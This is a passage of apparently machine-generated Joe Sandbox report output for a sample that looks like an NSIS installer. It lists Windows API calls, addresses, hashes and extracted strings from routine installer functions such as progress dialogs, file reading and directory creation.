                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                      • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                      • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                      APIs
                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                        • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                      • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                      • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                      • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                      • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                      • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                      • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 2531174081-0
                                                                                      • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                      • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                      • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                      • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                      • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                      • wsprintfW.USER32 ref: 00402EF5
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                        • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 722711167-2449383134
                                                                                      • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                      • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                      • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                      • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                      • GetMessagePos.USER32 ref: 00404D3D
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                      • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                      • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                      • wsprintfW.USER32 ref: 004067A4
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                      • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                      • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                      • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                      • wsprintfW.USER32 ref: 00402E45
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                      • API String ID: 1451636040-1158693248
                                                                                      • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                      • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                      • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                      • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                      • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                      • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                      • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                      • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                      • wsprintfW.USER32 ref: 00404CB6
                                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$(7B
                                                                                      • API String ID: 3540041739-1320723960
                                                                                      • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                      • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                      • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                      • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                      • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                      • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: *?|<>/":
                                                                                      • API String ID: 589700163-165019052
                                                                                      • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                      • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                      • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                      • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 1941528284-0
                                                                                      • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                      • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                      • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                      • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                      • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID:
                                                                                      • API String ID: 3808545654-0
                                                                                      • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                      • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                      • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                      • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                      • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                      • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                      • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                      • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                      • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                      • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$Enum
                                                                                      • String ID:
                                                                                      • API String ID: 464197530-0
                                                                                      • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                      • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                      • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                      • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                      • GetLastError.KERNEL32 ref: 00405976
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                      • GetLastError.KERNEL32 ref: 00405995
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
